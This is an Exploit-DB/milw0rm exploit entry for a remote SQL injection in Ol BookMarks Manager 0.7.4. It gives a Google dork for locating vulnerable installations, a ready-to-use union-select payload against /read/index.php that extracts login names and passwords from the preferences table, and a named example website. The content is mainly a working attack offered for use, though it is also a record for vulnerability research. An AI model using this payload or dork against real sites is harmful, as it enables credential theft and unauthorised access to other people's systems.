Ol BookMarks Manager 0.7.4 - SQL Injection
Author: Mehmet Ince
type: webapps
platform: php
port:
date_added: 2007-05-20
date_updated: 2016-10-05
verified: 1
codes: OSVDB-36492;CVE-2008-6409;CVE-2007-2817;CVE-2007-2816
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comolbookmarks-0.7.4.tar.gz
==========================================================================
Ol Bookmarks Manager 0.7.4 (root) Remote SQL Injection Vulnerabilities
==========================================================================
Found by: Cyber-Security
==========================================================================
D0rk : allintitle:ol'bookmarks
==========================================================================
Download: http://mesh.dl.sourceforge.net/sourceforge/olbookmarks/olbookmarks-0.7.4.tar.gz
==========================================================================
/read/index.php?name=alex&id=-1/**/union/**/select/**/0,1,2,3,4,5,password,login,8,9,10,11,12/**/from/**/preferences/*
Example: http://www.blex.co.uk/bookmarks
==========================================================================
thanx: ThE TiGeR couse he found RFI to this script:)
==========================================================================
# milw0rm.com [2007-05-21]